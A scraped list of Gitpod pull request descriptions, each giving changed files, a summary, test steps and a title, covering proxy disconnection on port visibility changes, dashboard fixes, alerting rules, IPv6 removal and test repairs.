- components/ws-proxy/pkg/proxy/routes_test.go
This PR adds a mechanism to disconnect previously unauthenticated connections if the visibility of the workspace or port changes.
Fixes ENT-755
1. start a workspace
2. execute example stream server
3. make port public
4. try using curl `https://workspace-port-url/hello` and open this URL in browser (with login)
5. try to make port private
6. you will observe the curl command will disconnection immediately and browser one is still work.
```js
const express = require('express');
const app = express();
const sleep = (ms) => new Promise((resolve) => setTimeout(resolve, ms));
app.get('/hello', async (req, res) => {
res.write('hello');
while (true) {
await sleep(1000);
res.write('\nhello' + new Date());
}
})
app.listen(3000, () => {})
``` …
> [ws-proxy] close connection if workspace or port stopped share

- components/dashboard/src/components/Modal.tsx
- components/dashboard/src/components/billing/AddPaymentMethodModal.tsx
What the title says.
Fixes https://linear.app/gitpod/issue/ENT-844/cant-submit-the-payg-upgrade-plan-form-without-zooming-out
https://ft-fix-str9aaaa1bb95.preview.gitpod-dev.com/billing
> Fix Stripe modal on short viewports

- components/dashboard/src/AppNotifications.tsx
- components/dashboard/src/components/Alert.tsx
Fixes GRO-681
<ul>
<li><b>🏷️ Name</b> - siddhant-gb0033fee72</li>
<li><b>🔗 URL</b> - <a href="https://siddhant-gb0033fee72.preview.gitpod-dev.com/workspaces" target="_blank">siddhant-gb0033fee72.preview.gitpod-dev.com/workspaces</a>.</li>
<li><b>📦 Version</b> - siddhant-gro-681-gitpod-now-in-product-announcement-banner-gha.29240</li>
<li><b>🗒️ Logs</b> - <a href="https://console.cloud.google.com/logs/query;query=jsonPayload.kubernetes.host%3D%22preview-siddhant-gb0033fee …
> Updated App notification

- components/dashboard/src/Login.tsx
The sidebar on wider displays would occupy ⅓ of the entire screen, which is fine until you bring in an ultrawide monitor. This PR caps the sidebar's width at 32rem.
Fixes https://gitpod.slack.com/archives/C071G5TTS49/p1727791851430539
https://ft-fix-login-flicker.preview.gitpod-dev.com/workspaces
> Fix login sidebar width on very wide displays

- operations/observability/mixins/workspace/rules/satellite/workspaces.yaml
Notify in Slack and PagerDuty when backup failures occur. I'll create a separate PR for Enterprise.
Related to ENT-839
Relates to https://github.com/gitpod-io/runbooks/pull/433
Slack notifications will trigger in the future:
If it gets "bad", so will PagerDuty.
Slack notifications will trigger in the future:
gitpod:summary
<details>
</details>
<details>
</details>
<details>
</details>
<details>
Saves cost. …
> [ops] Introduce GitpodWsManagerMk2BackupFailureError and GitpodWsManagerMk2BackupFailureCritical

- components/ws-manager-mk2/controllers/status.go
Include the node name, if available, in workspace failed log entries. This'll help us more easily determine if a single node is poisoned, or if the problem is more wide spread.
Related to https://gitpod.slack.com/archives/C01TNS8EVQT/p1727709074376869
Try starting a workspace, kill registry-facade while the image is pulling:
Observe [the log entry](https://console.cloud.google.com/logs/query;cursorTimestamp=2024-09-30T18:20:13.798930806Z;duration=PT1H;lfeCustomFields=jsonPayload%252Fkubernetes%252Fcontainer_name;query=--%20without%20protected_secrets%20enabled%0AjsonPayload.kubernetes.host%3D%22preview-kylos101-nodename%22%0A%22workspace%20failed%22%0A--%20jsonPayload.workspaceId%3D%22gitpodio-templatepython-26ftql9iecs%22%0Atimestamp%3D%222024-09-30T18:20:13.798930806Z%22%0AinsertId%3D%22 …
> [ws-manager-mk2] include nodeName on failure

- components/dashboard/src/Login.tsx
I introduced a regression in #20255 which couldn't handle URL hashes on the login page which weren't URLs. This also meant we couldn't handle logging in with URLs starting with prefixes like `imagebuild/` or `VARIABLE=value`.
Fixes #20263
https://ft-fix-log430fae49f1.preview.gitpod-dev.com
/hold
> Fix login URL host parsing regression

- components/dashboard/src/menu/Menu.tsx
- components/dashboard/src/workspaces/Workspaces.tsx
- components/gitpod-cli/cmd/docs.go
Because the base `/docs` path now redirects to Flex docs, this change makes all of our links to the docs end up on the Enterprise version instead, so that it doesn't get too confusing.
Fixes ENT-856
> Fix docs URLs

- components/gitpod-protocol/src/util/gitpod-host-url.ts
- components/server/src/api/workspace-service-api.ts
- components/server/src/authorization/spicedb-authorizer.ts
- components/server/src/workspace/workspace-service.ts
If you called `WorkspaceService.GetWorkspace` with `workspaceId: valid-workspace-id?hello`, we would let SpiceDB throw an exception, because `checkPermission` would fail. This PR fixes that from 2 fronts:
1. We no longer consider SpiceDB returning `INVALID_ARGUMENT` a system exception and instead throw a `ErrorCodes.BAD_REQUEST`.
2. We now validate workspace IDs on every `WorkspaceService` method that needs it using a Regex that seems to have worked for us for ~ 2 years. 
Fixes ENT-842
Make a request to some API under `WorkspaceServer` with an invalid workspace ID, you should get back "a valid workspaceId is required" 
```
curl 'https://ft-fix-spi5a78964ae9.preview.gitpod-dev.com/public-api/gitpod.v1.WorkspaceService/GetWorkspace' --compressed -X POST -H 'content-type: application/json' …
```
> Fix spicedb throwing on invalid arguments

- components/gitpod-protocol/src/util/gitpod-host-url.ts
- components/gitpod-protocol/src/util/parse-workspace-id.spec.ts
- components/gitpod-protocol/src/util/parse-workspace-id.ts
- components/server/src/api/workspace-service-api.ts
- components/server/src/authorization/spicedb-authorizer.ts
Addressed @geropl's review comments on #20269 
If needed, a preview environment is up @ https://ft-spicedba044be1f63.preview.gitpod-dev.com/workspaces
> Follow-ups from #20269

- install/installer/pkg/components/ide-service/ide-configmap.json
Update code to `1.94.1`
<ul>
<li><b>📦 Version</b> - ide-code-release-gha.29453</li> …
> [VS Code Browser] Update stable code to `1.94.1`

- components/ide/jetbrains/backend-plugin/src/main/kotlin/io/gitpod/jetbrains/remote/AbstractGitpodPortForwardingService.kt
- components/server/src/workspace/workspace-starter.ts
Fixes ENT-826
- Try to enable or disable [FeatureFlag](https://app.configcat.com/08da1258-64fb-4a8e-8a1e-51de773884f6/08da1258-6541-4fc7-8b61-c8b47f82f3a0/08da1258-6512-4ec0-80a3-3f6aa301f853?settingId=567437)
- Restart or create workspace with IntelliJ IDEA (latest or stable, but not pinned) after update FF (needs server aware FF changes, i.e. after 5 minutes)
- Check ports view, ports should not expose to local (or access `localhost:<port>`)
|Disabled Ports Exposing|Enabled|
|:-:|:-:|
|<img width="1578" alt="SCR-20241009-opju" src="https://github.com/user-attachments/assets/4f7f583b-47e8-4e00-82fb-77187d661afd">|<img width="1473" alt="SCR-20241009-oros" src="https://github.com/user-attachments/assets/7812bd58-13cc-43a2-8fd6-b3794d1d6332">|
<p>Gitpod was successfully deployed to your …
> Disable JetBrains local ports forwarding with FF

- components/dashboard/src/data/git-providers/unified-repositories-search-query.test.ts
- components/dashboard/src/data/git-providers/unified-repositories-search-query.ts
- components/dashboard/src/utils.ts
Adds generic validation for git URLs when inputting into the "New Workspace" repository search bar.
Supported are both full URLs (https://, http://, ssh://, git://) as well as SSH clone URLs (like `git@github.com:gitpod-io/gitpod.git`).
Fixes ENT-596
1. See tests I added for this
2. Go to https://ft-better-374e81d1de.preview.gitpod-dev.com/new and play around with the input
> Improve repository finder search URL validation

- components/ide/jetbrains/gateway-plugin/src/main/kotlin/io/gitpod/jetbrains/gateway/GitpodConnectionProvider.kt
- Connection provider will wait until workspace is stopped then terminate itself
- If the stopped is due to Timed out then we will show a timed out dialog
- If user close connection himself, we wait for 5 seconds
Fixes ENT-804
**Smoke test Gitpod Gateway Plugin**
- Use Gateway 2024.2.3 beta
- Download matching version of Gitpod Plugin (contains branch name) in Dev channel https://plugins.jetbrains.com/plugin/18438-gitpod-gateway/versions/dev
- Install Plugin manually with matching Gateway version
- **Quit Gateway after Plugin is installed**
- Open a workspace in any Gitpod installation (i.e. catfood) with IntelliJ IDEA as your editor
- Click 'Open in IntelliJ IDEA' after workspace is ready
- Set workspace timeout duration to 1 minute `gp timeout set 1m`
- Wait 1 minute (more?)
- You …
> [JetBrains] improve handling of client connection termination

- components/ide/jetbrains/gateway-plugin/src/main/kotlin/io/gitpod/jetbrains/auth/GitpodAuthCallbackHandler.kt
- components/ide/jetbrains/gateway-plugin/src/main/kotlin/io/gitpod/jetbrains/auth/GitpodAuthService.kt
Fixes ENT-865
**Smoke test Gitpod Gateway Plugin**
- Use EAP Gateway
- Download matching version of Gitpod Plugin (contains branch name) in Dev channel https://plugins.jetbrains.com/plugin/18438-gitpod-gateway/versions/dev
- Install Plugin manually with matching Gateway version
- There should show no error red dot on right bottom of Gateway UI
- Auth flow should work well
gitpod:summary
<details>
</details>
<details>
</details>
<details>
</details>
<details>
If …
> Fix constant Gitpod Plugin exception on Gateway startup

- components/dashboard/src/components/podkit/combobox/Combobox.tsx
- components/server/src/workspace/context-parser-service.ts
Makes bad requests against our context parser, no longer page folks.
Fixes https://gitpod.slack.com/archives/C01TNS8EVQT/p1728825373116179
1. Try going to https://ft-fix-dasd89bbe5f6e.preview.gitpod-dev.com/new#bitbucket-server. `ParseContextURL` should respond with a 400 and not a 500 in the network tab of DevTools.
> Repository finder & context parsing improvements

- components/supervisor/frontend/src/ide/supervisor-service-client.ts
When `supervisor_check_ready_retry` is disabled, don't report any `supervisor_check_ready` events.
Fixes https://gitpod.slack.com/archives/C071G5TTS49/p1728468748822559
You can try opening a workspace on https://ft-limit-sb2f59260e6.preview.gitpod-dev.com/workspaces and inspecting the network tab for outgoing `trackEvent` requests.
/hold
> Don't report `supervisor_check_ready` unless the FF is enabled

- components/dashboard/src/prebuilds/detail/PrebuildDetailPage.tsx
- components/dashboard/src/start/StartWorkspace.tsx
- components/server/src/workspace/workspace-starter.ts
- components/supervisor/pkg/supervisor/config.go
- components/supervisor/pkg/supervisor/supervisor.go
Make the message you see when an image build fails nicer for humans, including the recommendation for `gp validate`. 
Fixes ENT-724
1. Open https://ft-nicer-ie500177c4c.preview.gitpod-dev.com/new#https://github.com/kylos101/gitpod-custom-image/tree/kylos101/build-fail
> Provide a nicer image build failed message

- WORKSPACE.yaml
Build code version `1.94.2` (`6abdb44c9aef41158d03011b21635e5977413941`)
<ul> …
> [VS Code Browser] Build stable code `1.94.2`

- install/installer/pkg/components/ide-service/ide-configmap.json
Update code to `1.94.2`
<ul>
<li><b>📦 Version</b> - ide-code-release-gha.29601</li> …
> [VS Code Browser] Update stable code to `1.94.2`

- components/public-api/typescript-common/src/public-api-converter.ts
Fixes https://linear.app/gitpod/issue/CLC-840/workspaces-dashboard-broken-for-a-specific-user
<ul>
<li><b>🏷️ Name</b> - axonasif-undef-err</li>
<li><b>🔗 URL</b> - <a href="https://axonasif-undef-err.preview.gitpod-dev.com/workspaces" target="_blank">axonasif-undef-err.preview.gitpod-dev.com/workspaces</a>.</li>
<li><b>📦 Version</b> - axonasif-undef_err-gha.29613</li>
<li><b>🗒️ Logs</b> - <a href="https://console.cloud.google.com/logs/query;query=jsonPayload.kubernetes.ho …
> fix: avoid accessing null value

- components/ide/code/leeway.Dockerfile
Fix code dockerfile for code nightly
- Run [code nightly action](https://github.com/gitpod-io/gitpod/actions/workflows/code-nightly.yml) on this branch and check it builds successfully
gitpod:summary
<details>
</details>
<details>
</details>
<details>
</details>
<details> …
> [code] Fix code dockerfile

- .github/workflows/code-build.yaml
- components/ide/code/BUILD.yaml
- components/ide/code/leeway.nightly.Dockerfile
Follow up for https://github.com/gitpod-io/gitpod/pull/20308#issuecomment-2425919457 and [internal chat](https://gitpod.slack.com/archives/C045J13P8A1/p1729291383860729?thread_ts=1728919134.138729&cid=C045J13P8A1)
Fixes #
No need, or you could compare the changes between code > `leeway.Dockerfile` and `leeway.nightly.Dockerfile`
gitpod:summary
<details>
</details>
<details>
</details>
<details>
</details>
<details> …
> Fix stable code build

- components/ide/gha-update-image/lib/jb-helper/jb-gradle-task-config.ts
- components/ide/gha-update-image/lib/jb-helper/jb-helper.ts
There're some back and forth, I'm not quite sure how they define it but can confirm we need to use `build` for Gateway Plugin (EAP) now
Fixes https://github.com/gitpod-io/gitpod/pull/20301 that it should not use `version`
No need to test
gitpod:summary
<details>
</details>
<details>
</details>
<details>
</details>
<details> …
> [gha] update gateway EAP plugin to use `build` instead of `version`

- components/dashboard/src/prebuilds/list/PrebuildList.tsx
- components/dashboard/src/prebuilds/list/PrebuildTable.tsx
Adds our garbage collection policy for prebuilds as a notice in the organization prebuilds list
This is displayed at all times if the number of displayed prebuilds is > 1. This was done to reduce confusion when onboarding.
Fixes CLC-838
1. [Join my org](https://ft-prebuila8b3a76da0.preview.gitpod-dev.com/orgs/join?inviteId=1f13050c-d2eb-4d99-835b-d8926dcbafd3)
2. Take a gander at `/prebuilds`
> [dashboard] Add a notice of Prebuild GC to the prebuilds list

- components/supervisor/cmd/init.go
- components/supervisor/go.mod
- components/supervisor/go.sum
Fixes CLC-879
**No need to test**, or you could:
- Cherry pick the debug commit of #20318, and exec `hot-deploy.sh` in `components/ide/jetbrains/launcher`
```sh
cd components/ide/jetbrains/launcher
git cherry-pick 1b6bde80c410034b62e235438b8f7262fa7f63b6
./hot-deploy.sh
```
- Wait around 1 minute
- Follow tests in #20318
<ul>
<li><b>🏷️ Name</b> - hw-clc-879</li>
<li><b>🔗 URL</b> - <a href="https://hw-clc-879.preview.gitpod-dev.com/workspaces" target="_blank">hw-clc-879.preview.gitpod-dev.com/workspaces</a>.</li>
<li><b>📚 Documentation</b> - See our <a href="https://www.notion.so/gitpod/6debd359591b43688b52f76329d04010#7c1ce80ab31a41e29eff2735e38eec39" target="_blank">internal documentation</a> …
> [supervisor] switch lib back to use upstream `ramr/go-reaper`

- components/dashboard/src/AppNotifications.tsx
Added a reusable notification factory to standardize creation of dismissible notifications with tracking. This reduces code duplication and makes adding new notifications simpler.
- Added `GENERAL_NOTIFICATION` factory function
- Refactored AWS re:Invent notification to use the factory
- Maintains existing functionality for dismissal, tracking and user profile updates
Fixes #
<ul>
<li><b>🏷️ Name</b> - chore-aws-2d1ac28bf0</li>
<li><b>🔗 URL</b> - <a href="https://chore-aws-2d1ac28bf0.preview.gitpod-dev.com/workspaces" target="_blank">chore-aws-2d1ac28bf0.preview.gitpod-dev.com/workspaces</a>.</li>
<li><b>📚 Documentation</b> - See our <a href="https://www.notion.so/gitpod/6debd359591b43688b52f76329d04010#7c1ce80ab31a41e29ef …
> Add AWS re:Invent 2024 notification

- components/supervisor/cmd/init.go
- components/supervisor/go.mod
- components/supervisor/go.sum
Related to CLC-877 and https://gitpod.slack.com/archives/C071G5TTS49/p1730146705613519
Related to https://github.com/gitpod-io/gitpod/pull/20318 and https://github.com/gitpod-io/gitpod/pull/20322
Timeout a workspace many times in the preview environment. It's final state should be consistent.
<ul>
<li><b>🏷️ Name</b> - kylos101-clc-877</li>
<li><b>🔗 URL</b> - <a href="https://kylos101-clc-877.preview.gitpod-dev.com/workspaces" target="_blank">kylos101-clc-877.preview.gitpod-dev.com/workspaces</a>.</li>
<li><b>📚 Documentation</b> - See our <a href="https://www.notion.so/gitpod/6debd359591b43688b52f76329d04010#7c1ce80ab31a41e29eff2735e38eec39" target="_blank">internal documentation</a> for information on how to interact …
> [supervisor] revert recent changes to reduce frequency of `supervisor run error with unexpected exit code`

- components/ws-daemon/nsinsider/main.go
- components/ws-daemon/pkg/iws/iws.go
This PR disable workspace ipv6, we don't really support it, and it also blocked the latest version of Docker.
Fixes CLC-817
1. start a workspace form this preview env
2. run `ip a` make sure all interface don't have ipv6 address
3. run `sudo install-packages docker-ce docker-ce-cli containerd.io docker-buildx-plugin` to install latest docker 
4. run `docker version` for validate docker is in latest version 27.x
5. run `docker run --rm -it alpine` for validate docker can start container
6. inside container run `ip a` make sure all interface don't have ipv6 address
<ul>
<li><b>🏷️ Name</b> - pd-clc-817</li>
<li><b>🔗 URL</b> - <a href="https://pd-clc-817.preview.gitpod-dev.com/workspaces" …
> Disable ipv6 inside workspace

- .devcontainer/Dockerfile
- dev/flex-oidc/oidc.js
- dev/preview/workflow/preview/configure-workspace.sh
Add flex oidc support
Fixes CLC-885
Fixes CLC-887
1. start an environment in flex from this branch, try `gcloud projects list`
gitpod:summary
<details>
</details>
<details>
</details>
<details>
</details>
<details>
Valid options are `all`, `workspace`, `webapp`, `ide`, `jetbrains`, `vscode`, `ssh`. If enabled, `with-preview` …
> Add flex oidc support

- WORKSPACE.yaml
Bumps the browser terminal to https://github.com/gitpod-io/xterm-web-ide/commit/d547d4ff4590b66c3ea24342fc62e3afcf6b77bc to include changes with the introduction of the `XTERM_CONFIRM_BROWSER_EXIT` environment variable.
Fix https://github.com/gitpod-io/gitpod/issues/18416
/hold
<ul>
<li><b>🏷️ Name</b> - ft-bump-xterm</li>
<li><b>🔗 URL</b> - <a href="https://ft-bump-xterm.preview.gitpod-dev.com/workspaces" target="_blank">ft-bump-xterm.preview.gitpod-dev.com/workspaces</a>.</li> …
> Bump Browser Terminal

- components/local-app/pkg/bastion/bastion.go
- components/supervisor/pkg/ports/served-ports.go
We have seen a lot of errors yesterday on catfood about our hitting our subscription limit for the PortsService of the supervisor. 
Fixes CLC-890
1. Try using the local companion to forward ports against the preview environment 
/hold
> [supervisor] Fix subscription leaks in PortsStatus

- components/dashboard/src/components/RepositoryFinder.tsx
Prevents showing a given example repository when it cannot be opened given the current auth provider configuration.
Fixes CLC-902
You can test by opening https://ft-fix-una8406a84f5e.preview.gitpod-dev.com/workspaces and seeing that there are still only 2 suggested repositories, both from github.com. In the actual preview env, there is a third one on an arbitrary host, but it is correctly not visible because there is no auth setup with it.
/hold
> [dashboard] do not show repo examples from incompatible providers

- install/installer/pkg/components/ide-service/ide-configmap.json
Update code to `1.95.0`
<ul>
<li><b>📦 Version</b> - ide-code-release-gha.29870</li> …
> [VS Code Browser] Update stable code to `1.95.0`

- components/workspacekit/cmd/rings.go
Fixes CLC-907
<ul>
<li><b>🏷️ Name</b> - pd-clc-907</li>
<li><b>🔗 URL</b> - <a href="https://pd-clc-907.preview.gitpod-dev.com/workspaces" target="_blank">pd-clc-907.preview.gitpod-dev.com/workspaces</a>.</li>
<li><b>📦 Version</b> - pd-CLC-907-gha.29890</li>
<li><b>🗒️ Logs</b> - <a href="https://console.cloud.google.com/logs/query;query=jsonPayload.kubernetes.host%3D%22preview-pd-clc-907%22%0A%0A--%20Filter%20on%20service:%0A--%20jsonPayload.serviceContext.service%3D%22ws …
> Remove non-ipv4 entry from /etc/hosts

- components/gitpod-protocol/data/gitpod-schema.json
- components/gitpod-protocol/go/gitpod-config-types.go
- components/gitpod-protocol/src/protocol.ts
- components/server/src/user/env-var-service.spec.db.ts
- components/server/src/user/env-var-service.ts
- components/server/src/workspace/gitpod-server-impl.ts
- components/server/src/workspace/workspace-starter.ts
The `.gitpod.yml` spec has [not changed](https://github.com/gitpod-io/gitpod/commits/main/components/gitpod-protocol/data/gitpod-schema.json) for more than 2 years! Let's break the streak.
This PR introduces the top-level `env` keyword to the `.gitpod.yml` file, defining key-value pairs of environment variables that ought to be available on workspaces created from it.
Here is an example:
```yaml
image: gitpod/workspace-full
env:
BOND: "007"
```
Simple enough. The funny part comes when you try to plug this approach into our existing approaches for setting environment variables.
```mermaid
graph TD
A["Environment Variable Overriding in Gitpod Workspaces"] 
A --> |"1 (Highest Priority)"| B[".gitpod.yml[tasks][n][env]"]
B --> |"2"| C["Environment variables passed via the context URL"]
C --> …
```
> [.gitpod.yml] Introduce top-level `env`

- test/tests/ide/jetbrains/warmup-indexing.sh
Fixes CLC-778
No need. See screenshot below, scan type is not `full on project open` anymore. But I found their reason is the same (screenshot 2)
(Maybe the better idea is to plus 1 and 2 as total scheduled indexings on screenshot 1)
gitpod:summary
<details>
</details>
<details>
</details>
<details>
</details>
<details>
Valid …
> [tests] fix JetBrains warmup integration test

- .github/workflows/jetbrains-auto-update-template.yml
Fixes CLC-914
Check GHA https://github.com/gitpod-io/gitpod/actions/runs/11707733035/job/32607849995
gitpod:summary
<details>
</details>
<details>
</details>
<details>
</details>
<details> …
> [gha] prevent slack notifications for skipped JetBrains nightly builds

- operations/observability/mixins/workspace/rules/central/image-builder.yaml
- operations/observability/mixins/workspace/rules/central/node-labeler.yaml
- operations/observability/mixins/workspace/rules/central/ws-manager.yaml
- operations/observability/mixins/workspace/rules/central/ws-proxy.yaml
Adds alerts based on `kube_deployment_status_replicas_unavailable`.
It much better fits what we are aiming for then the existing "replica mismatch" alerts, see this image:
- green: existing alerts, only notify at the end (overlapping spike)
- yellow: new alerts, notifying from the beginning (with the 10m timeout window)
Related: CLC-909
- 
gitpod:summary
<details>
</details>
<details>
</details>
<details>
</details>
<details> …
> [observability] Introduce "ReplicaUnavailable" alerts

- components/public-api/typescript-common/fixtures/toWorkspace2_1.golden
- components/public-api/typescript-common/fixtures/toWorkspace2_2.golden
- components/public-api/typescript-common/fixtures/toWorkspace2_3.golden
- components/public-api/typescript-common/fixtures/toWorkspace3_adminPage_1.golden
- components/public-api/typescript-common/fixtures/toWorkspace3_adminPage_2.golden
- components/public-api/typescript-common/fixtures/toWorkspaceSession_1.golden
- components/public-api/typescript-common/fixtures/toWorkspaceSession_2.golden
- components/public-api/typescript-common/fixtures/toWorkspaceSession_3.golden
- components/public-api/typescript-common/fixtures/toWorkspaceSession_4.golden
For some reason, https://github.com/gitpod-io/gitpod/pull/20345 got merged without reporting any failed tests when I changed the converter in there (maybe because I only changed the inputs from `server` and not the actual public API code).
> Fix public API test on `main`

- components/server/src/workspace/workspace-service.ts
When further investigating CLC-854, we stumbled upon a case we might not be covering with our current logs: if, for any reason, none of the properties used to assemble the `lastActive` time are present, we return early and don't update the GC eligibility time.
It also adds a common prefix for these logs to make finding them easier
Related to CLC-854
/hold
> Log edge case for `updateDeletionEligibilityTime`

- components/server/src/prebuilds/incremental-workspace-service.ts
- components/server/src/prebuilds/prebuild-manager.ts
- components/server/src/workspace/context-service.spec.db.ts
- components/server/src/workspace/context-service.ts
More unit tests for prebuild selection which happens during context parsing.
Related: CLC-913
- see that unit tests are green
gitpod:summary
<details>
</details>
<details>
</details>
<details>
</details>
<details> …
> [server] Add more tests around "prebuild selection"

- components/supervisor/pkg/supervisor/ssh.go
- components/supervisor/pkg/supervisor/supervisor.go
- components/supervisor/pkg/terminal/service.go
[supervisor] add ptrace cap for all child process
Fixes CLC-843
Follow [this reproduce step](https://linear.app/gitpod/issue/CLC-843/attaching-debugger-to-running-processes-on-pycharm-fails-unless-you#comment-1167a58f), make sure Pycharm is able to attach with the running process.
<ul>
<li><b>🏷️ Name</b> - pd-clc-843</li>
<li><b>🔗 URL</b> - <a href="https://pd-clc-843.preview.gitpod-dev.com/workspaces" target="_blank">pd-clc-843.preview.gitpod-dev.com/workspaces</a>.</li> …
> [supervisor] add ptrace cap for all child process

- components/server/src/bitbucket-server/bitbucket-server-repository-provider.spec.ts
- components/server/src/bitbucket-server/bitbucket-server-repository-provider.ts
The tests still targetted our old self-hosted instance and had some inconsistencies with actual current behavior.
Additionally, this PR fixes a bug with the `getCommitHistory` method, which wrongly included the current commit as part of the history (this was the only SCM provider left for which we didn't skip the requested revision in the response). 
Fixes CLC-932
```
GITPOD_TEST_TOKEN_BITBUCKET_SERVER=VALUE_FROM_1PASSWORD yarn mocha './**/bitbucket-server-repository-provider.spec.js' --exclude './node_modules/**' --exit
```
/hold
> Fix Bitbucket Server repository provider tests 

- components/server/src/dev/dev-data.ts
- components/server/src/errors/index.ts
- components/server/src/github/github-context-parser.spec.ts
- components/server/src/github/github-repository-provider.spec.ts
- components/server/src/github/github-repository-provider.ts
Looks like we haven't run these in a while (at least a year and a half), and they needed some love. This PR provides that love.
Run the GitHub integrations tests in `server`
```
export GITPOD_TEST_TOKEN_GITHUB='{"username": "gitpod-integration-test", "value": "ghp_..."}'
cd components/server
yarn mocha './**/*.spec.js' --exclude './node_modules/**' --exit
```
The token is in 1Password.
Fixes CLC-930
/hold
> Fix GitHub Integration tests

- components/server/src/workspace/config-provider.ts
- components/server/src/workspace/image-source-provider.ts
If you pointed to your Dockerfile with `./.gitpod.Dockerfile` instead of `.gitpod.Dockerfile`, it would fail. That is simply because SCM APIs (at least GitHub, which I've checked) expect a path without any relative decorators relative to the repository root.
Fixes CLC-926
Try to open https://github.com/filiptronicek/test-foofies/commit/2b2ae74d74a36640d089c8072e0bbd6c9493e852 in the e and in Catfood. It will give you a warning in Catfood, but should not in the preview env.
/hold
> Fix Dockerfile paths with relative decorators

- components/ws-manager-mk2/controllers/status.go
Ensures we don't accidentally mark workspaces as PodRejected when they have been "ready" already.
Fixes CLC-942
gitpod:summary
<details>
</details>
<details>
</details>
<details>
</details>
<details> …
> [ws-manager] don't ever set PodRejected if WorkspaceConditionEverReady=true

- WORKSPACE.yaml
Build code version `1.95.3` (`f84b3d2b3d3c405cc4ade8deadfb8621066ec8ad`)
<ul> …
> [VS Code Browser] Build stable code `1.95.3`

- components/dashboard/src/components/SelectIDEComponent.tsx
Removes the middot when there is nothing to separate.
| <img width="642" alt="image" src="https://github.com/user-attachments/assets/6d3a7a67-bf28-4ee5-9712-c1cb02ddb591"> | <img width="642" alt="image" src="https://github.com/user-attachments/assets/70527ee4-27fb-4ed8-86f4-a63edbaa5db6"> | 
https://ft-ide-sel0195905d1a.preview.gitpod-dev.com/new
/hold
> Fix middot for VS Code desktop in IDE selector

- components/supervisor/cmd/init.go
Adds more logging around supervisor stopping.
Related to: CLC-925
<ul>
<li><b>🏷️ Name</b> - gpl-925-ad27241b66e1</li>
<li><b>🔗 URL</b> - <a href="https://gpl-925-ad27241b66e1.preview.gitpod-dev.com/workspaces" target="_blank">gpl-925-ad27241b66e1.preview.gitpod-dev.com/workspaces</a>.</li>
<li><b>📦 Version</b> - gpl-925-add-supervisor-logging-gha.30231</li>
<li><b>🗒️ Logs</b> - <a href="https://console.cloud.google.com/logs/query;query=jsonPayload.kubernetes.host%3D%22pr …
> [supervisor] init: Add logging around termination

- WORKSPACE.yaml
- components/ide/code/gitpod-web-extension/leeway.Dockerfile
Fix gitpod-web dockerfile, it was running jq commands in wrong folder
Fixes #
<ul>
<li><b>🏷️ Name</b> - jp-chubby-whippet</li>
<li><b>🔗 URL</b> - <a href="https://jp-chubby-whippet.preview.gitpod-dev.com/workspaces" target="_blank">jp-chubby-whippet.preview.gitpod-dev.com/workspaces</a>.</li>
<li><b>📦 Version</b> - jp-chubby-whippet-gha.30248</li>
<li><b>🗒️ Logs</b> - <a href="https://console.cloud.google.com/logs/query;query=jsonPayload.kubernetes.host%3D%22preview-jp-c …
> [code] Fix gitpod-web dockerfile

- components/dashboard/src/data/featureflag-query.ts
- components/dashboard/src/data/git-providers/search-repositories-query.ts
- components/server/src/bitbucket-server/bitbucket-server-repository-provider.spec.ts
- components/server/src/bitbucket-server/bitbucket-server-repository-provider.ts
The feature flag has been enabled in all environments for quite some time now, making it fit for removal.
After deploying to all connected cells, we can get rid of the ConfigCat value as well.
Fixes CLC-946
/hold
> Clean up `repositoryFinderSearch` feature flag

- components/server/src/bitbucket/bitbucket-repository-provider.ts
Follow-up for https://github.com/gitpod-io/gitpod/pull/20379 to not leak our auth tokens in CI 🤭.
Fixes https://gitpod.slack.com/archives/C071G5TTS49/p1732805834179759
Let tests run. ~~I'll need to edit repo secrets to make them pass though, so this is a draft for now~~
> Don't be so chatty when `hasReadAccess` throws

- test/tests/components/ws-manager/dotfiles_test.go
Looks like dotfile test failed because of outdated secret of GitHub Secret `WORKSPACE_INTEGRATION_TEST_USER_TOKEN` [[main build](https://github.com/gitpod-io/gitpod/actions/runs/12049138489/job/33596196474)]
PR action https://github.com/gitpod-io/gitpod/actions/runs/12065222732/job/33644087485?pr=20397
Fixes CLC-923
Check integration tests result of current PR
<ul>
<li><b>🏷️ Name</b> - hw-dotfile-test</li>
<li><b>🔗 URL</b> - <a href="https://hw-dotfile-test.preview.gitpod-dev.com/workspaces" target="_blank">hw-dotfile-test.preview.gitpod-dev.com/workspaces</a>.</li> …
> [tests] show dotfile installing failure reason

- components/public-api-server/pkg/apiv1/workspace.go
Follow up for https://github.com/gitpod-io/gitpod/pull/20405
Fixes https://github.com/gitpod-io/gitpod/actions/runs/12090605717/job/33717859659
- Open a workspace with current PR in Gitpod
- Run tests
```
leeway run components/gitpod-db:init-testdb
cd components/public-api-server
go test ./...
```
gitpod:summary
<details>
</details>
<details>
</details>
<details>
</details>
<details>
Saves cost. Untick this only …
> [papi] fix unit tests for workspaces service

- components/server/src/bitbucket-server/bitbucket-server-context-parser.ts
- components/server/src/bitbucket-server/utils.ts
- components/server/src/bitbucket/bitbucket-context-parser.ts
- components/server/src/bitbucket/bitbucket-file-provider.ts
- components/server/src/bitbucket/bitbucket-repository-provider.ts
A follow-up for https://github.com/gitpod-io/gitpod/pull/20400
/hold
> [server] fix more revealing BB error logs

- components/server/src/bitbucket-server/bitbucket-server-repository-provider.spec.ts
- components/server/src/bitbucket/bitbucket-repository-provider.spec.ts
- components/server/src/github/github-repository-provider.spec.ts
- components/server/src/gitlab/gitlab-repository-provider.spec.ts
Adds integration tests that aim to describe the caveats and differences in searching behavior across SCMs.
Explained in words, the capabilities are as follows:
| Capability | Bitbucket | Bitbucket Server | GitHub | GitLab |
|--------|--------|--------|--------|--------|
| Search by name substring | ✅ | ❌ | ✅ | ✅ |
| Match search against entire path | ❌ | ❌ | ✅ [^1] | ❌ |
| Can search < 3 characters | ✅ | ✅ | ✅ | ❌ |
Azure DevOps does not have any search support yet (see CLC-780)
Is part of explorations for CLC-945
See changes
/hold
[^1]: there is a caveat with this: GitHub only supports searching against the full paths when the search string is a suffix of the result.
> [server] Add SCM repo search integration tests

- components/scrubber/scrubber.go
- components/scrubber/scrubber_test.go
[scrubber] skip if interface is nil 
Fixes CLC-875
see unit test
gitpod:summary
<details>
</details>
<details>
</details>
<details>
</details>
<details>
</details>
/hold
> [scrubber] skip if interface is nil

- components/dashboard/src/AppNotifications.tsx
Just like https://github.com/gitpod-io/gitpod/pull/20268, but newer.
Fixes CLC-1004
> [dashboard] Privacy policy update notification

- components/server/src/prebuilds/prebuild-manager.ts
- components/server/src/projects/projects-service.ts
- components/server/src/workspace/headless-log-service.ts
